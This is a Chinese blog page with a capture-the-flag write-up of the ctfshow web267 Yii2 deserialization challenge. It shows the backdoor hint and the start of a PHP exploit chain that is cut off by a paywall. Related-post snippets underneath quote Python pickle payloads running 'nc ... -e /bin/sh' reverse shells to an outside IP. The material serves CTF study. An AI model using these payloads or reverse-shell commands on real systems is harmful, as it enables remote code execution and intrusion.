CTFshow 反序列化 web267

最新推荐文章于 2025-02-01 21:58:36 发布
最新推荐文章于 2025-02-01 21:58:36 发布
阅读量1.4k 收藏
点赞数 1
CC 4.0 BY-SA版权
分类专栏: CTFshow 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Kracxi/article/details/122888094
本文详细记录了解决CTFshow中web267反序列化问题的过程。通过尝试登录并分析源代码,作者在about页面找到线索,使用%2F进行路径遍历。了解到网站使用Yli框架2.0版本,进一步搜索该框架的漏洞信息,找到了针对Yii2 2.0.38之前版本的exploit,最终成功触发phpinfo页面。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

思路

进去是一个网页,在login页面试了下密码,发现是admin:admin,成功登录,但发现没什么改变

一个个页面查看源代码,最后再about页面中发现提示

在这里插入图片描述
访问?r=site%2Fabout&view-source拿到提示

///backdoor/shell
unserialize(base64_decode($_GET['code']))

刚开始不知道怎么去用,后面想到%2F就是/,尝试了下r=/backdoor/shell,提示要加上参数,然后思路又断了,应该是信息收集的不够

在这里插入图片描述
用Wappalyzer插件发现用的是Yli框架,又再源码中得知他用的是2.0版本,网上搜下有没有相关漏洞

在这里插入图片描述
在这里插入图片描述
参考博客:https://blog.youkuaiyun.com/xuandao_ahfengren/article/details/111259943中给出的exp,适用于Yii2 2.0.38 之前的版本

<?php
namespace yii\rest{
   
   
    class CreateAction{
   
   
        public $checkAccess;
        public $id;
 
        public function __construct(){
   
   
            $this->checkAccess = 'phpinfo'
最低0.47元/天 解锁文章

200万优质内容无限畅学
[ctfshow]web入门——反序列化web261+web264-web267
ShenZ的博客
03-02 6608
[ctfshow]web入门——反序列化 反序列化 unserialization [ctfshow]web入门——反序列化 web261 web264 str_replace字符串覆盖逃逸 web265 web266 web267 yii系列 反序列化 unserialization[ctfshow]web入门——反序列化
ctf_show笔记篇(web入门---反序列化
whale_waves的博客
03-19 2274
例如$a = 1 $b = 2, 这时让$b = &$a, 再给$a 重新赋个值 $a = 3, 这个时候$b就会一直跟着$a变化, $a是什么$b就是什么。利用php处理畸形的序列化的处理措施, 当php收到畸形的序列化时, 会因为对此序列化的不放心, 会第一时间处理掉它, 所以能直接让处理他的顺序排在了最前面。这时, 如果传入一个|O:5:"Class"类似于这样的序列化, php就会自动把|前面的当作键名用, 反而会反序列化|后的值。
[CTFSHOW web267]Yii2 反序列化漏洞(CVE-2020-15148)
Landasika的博客
05-17 1672
目录 [CTFSHOW web267]Yii2 反序列化漏洞(CVE-2020-15148)一、什么是YiiYii 是什么YiiYii 最适合做什么?二、漏洞分析三、漏洞pocyii 2.0.37 以前yii 2.0.37 以后四、WEB_267 [CTFSHOW web267]Yii2 反序列化漏洞(CVE-2020-15148) 一、什么是Yii 参考官网 https://ww...
ctfshow web入门 php反序列化 web267--web270
2301_81040377的博客
05-10 576
查看源代码发现这三个页面。然后发现登录页面直接。
ctf-show,web入门,反序列化254~267
2301_80548709的博客
03-23 1188
而%user变量后接了一个反序列化的函数,我们只需要写一个脚本,将创建类的将本序列化,传给cookie,同时注意到,源程序种没有将isVip更改的函数,所以序列化时这里也要注意,最后将其转码为url编码即可使用。
反序列化3(ctfshow web263-web267
最新发布
m0_72929232的博客
02-01 795
session.serialize_handler 是用来设置 session 序列化引擎的,在 5.5.4 前默认是 php,5.5.4后默认是 php_serialize,在 PHP 反序列化存储的 $_SESSION 数据时如果使用的引擎和序列化时使用的引擎不一样,就会导致数据无法正确第反序列化,也就是 session 反序列化漏洞。message.php页面要求设置Cookie:msg的值,没有要求,随便输入即可。用dirsearch扫一下,发现www.zip文件,访问下载下来是网站源码。
CTFshow 反序列化 web274
Kradress的博客
02-12 396
目录源码思路题解总结 源码 源码中提示反序列化入口 思路 去网上搜下ThinkPHP 5.1相关的漏洞 题解 找到2个exp 第一个 <?php namespace think; abstract class Model{ protected $append = []; private $data = []; function __construct(){ //GET传参 shell $this->data = ['shell' =
CTFshow 反序列化 web263
Kradress的博客
12-20 1515
目录源码思路题解总结 源码 也没有什么别的信息,扫一下目录,下载www.zip拿到源码 思路 知识点: php在session存储和读取时,都会有一个序列化和反序列化的过程,PHP内置了多种处理器用于存取$_SESSION数据,都会对数据序列化和反序列化,源码中有session_start的时候会读取session,从而进行反序列化. php . ini 中默认 session.serialize_handler 为 php_serialize,而 index.php 中将其设置为 php ,这个差
CTFshow 反序列化 web270
Kradress的博客
02-11 319
目录题解总结 题解 exp <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2021-05-03 21:55:29 # @Last Modified by: h1xa # @Last Modified time: 2021-05-04 01:25:28 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ namespace yii\rest { clas
CTFshow 反序列化 web277
Kradress的博客
02-12 676
目录源码题解总结 源码 查看源代码 提示pickle,得知考点是pickle反序列化 题解 exp 试了几次不能用bash,最后用了/bin/sh,因为环境里面没有装bash,得不到响应nc连上就会自动断开 import base64 import pickle class shell(object): def __reduce__(self): return (eval, ("__import__('os').system('nc 119.91.26.229 9999
[CTFSHOW][反序列化]web277、web278:python反序列化漏洞
weixin_53958123的博客
06-03 950
当时没有公网IP的服务器,就测试了能不能利用无回显sleep盲打脚本来弹出flag。先测试了以下sleep 5命令执行成功。用之前盲打脚本改了一下:
CTFshow 反序列化 web278
Kradress的博客
02-12 263
目录思路题解总结 思路 题目提示了过滤了os.system,那么我们把system改成popen().read() 题解 import base64 import pickle class shell(object): def __reduce__(self): return (eval, ("__import__('os').popen('nc 119.91.26.229 9999 -e /bin/sh').read()",)) k = shell() print(bas
ctf.show反序列化(web254-web278)
wanan的博客
08-31 9393
ctf.show反序列化(web254-web278)
ctfshow-web入门-反序列化web265-web270)
Welcome To Myon'Blog !
11-09 890
_destruct() 在对象被销毁时会自动调用,我们只需要让 ctfshow 类正确被反序列化即可,但是直接传 ctfshow 会被检测,之后就会抛出异常,如果程序报错或者抛出异常就不会触发 __destruct() 了,因为 throw 那个函数回收了自动销毁的类,导致 __destruct() 检测不到有东西销毁,从而也就无法触发 __destruct()。拿到 flag:ctfshow{f5b30e4e-16e1-4fb2-ad07-c75c6c069453}admin/admin 可以登录。
ctfshow web 反序列化(web254-278)
qq_50589021的博客
09-04 9647
知识储备 随笔分类 - PHP常识 PHP中的魔术变量: __sleep() //执行serialize()时,先会调用这个函数 __wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符时绕过) __construct() //当对象被创建时,会触发进行初始化 __destruct() //对象被销毁时触发 __toString(): //当一个对象被当作字符串使用时触发 __call() //在对象上下文中调用不可访问的方法时触发 __callStatic() //在静态上下文中
ctfshow web入门反序列化
qq_53063436的博客
11-06 1705
魔术变量: __sleep() //在对象被序列化之前运行 __wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符是会绕过) __construct() //在类实例化时,会触发进行初始化 __destruct() //对象被销毁时触发 __toString(): //当一个对象被当作字符串使用时触发 __call() //在对象上下文中调用不可访问的方法时触发 __callStatic() //在静态上下文中调用不可访问的方法时触发 __get() //获得一个类的成员变量时调
CTFshow刷题日记-WEB-反序列化篇(上,254-263)
Love&Share
09-22 3343
反序列化 web254-简单审计 这个题是搞笑的么???? 按着源码顺序走一遍 ...... $username=$_GET['username']; $password=$_GET['password']; if(isset($username) && isset($password)){ $user = new ctfShowUser(); if($user->login($username,$password)){ if($user->c
[CTF]CTFSHOW反序列化
Sapphire037的博客
01-20 4037
265 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-04 23:52:24 # @Last Modified by: h1xa # @Last Modified time: 2020-12-05 00:17:08 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); include('flag.php');
CVE-2020-15148 Yii反序列化漏洞复现
绮洛Ki1ro的博客
08-05 966
CVE-2020-15148 Yii反序列化漏洞复现
ctfshow 反序列化
01-21
其中涉及到了许多Web安全漏洞的实践练习,包括SQL注入、XSS攻击以及反序列化漏洞等。 #### 反序列化的概念 反序列化是指将保存的对象状态信息转换为对象的过程。如果应用程序允许用户控制的数据参与此过程,则可能...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值